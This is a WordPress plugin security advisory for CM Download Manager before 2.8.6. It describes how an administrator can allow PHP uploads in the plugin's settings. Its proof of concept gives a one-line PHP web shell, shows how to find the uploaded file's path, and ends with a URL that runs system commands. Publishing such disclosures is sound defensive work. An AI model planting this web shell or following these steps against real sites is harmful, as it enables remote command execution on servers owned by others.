WordPress Plugin Vulnerabilities
CM Download Manager < 2.8.6 - Admin+ Arbitrary File Upload
Description
The plugin allows high privilege users such as admin to upload arbitrary files by setting the any extension via the plugin's setting, which could be used by admins of multisite blog to upload PHP files for example.
Proof of Concept
########################## Activate PHP extension: ########################## - Log in and go to "CM Downloads" > "Settings" > "General". - Now you can simply add php extension to "Allowed file extensions:" field because the plugin does not check for php extension. ################################## Upload our malicious PHP file: ################################## - Go to "CM Downloads" > "Add New". - Upload our malicious file : For example : malicious_php.php <?=`$_GET[cmd]`?> ########################## Find the right path: ########################## We have two methods here because the code looks like: $name = time() . '_' . sanitize_file_name($_download_file['name']); But we don't need to write a script, we can exploit this more easily: - Go to "CM Downloads" > "CM Downloads". - Click on "Edit" on the name we gave to our Download and now we are redirect on a page. - We need to get the id present in the url for the following : http://target/cmdownload/edit/id/7/ => so here it's 7 - We can find the name of our malicious file below the "Browse" button : 1660921772_malicious_php.php - So now we can execute system command: => target/wp-content/uploads/cmdm/id/filename https://target/wp-content/uploads/cmdm/7/1660921772_malicious_php.php?cmd=command
Affects Plugins
Fixed in version 2.8.6
References
Classification
Type
UPLOAD
CWE
Miscellaneous
Original Researcher
Mika
Submitter
Mika
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-09-05 (about 6 months ago)
Added
2022-09-05 (about 6 months ago)
Last Updated
2022-09-05 (about 6 months ago)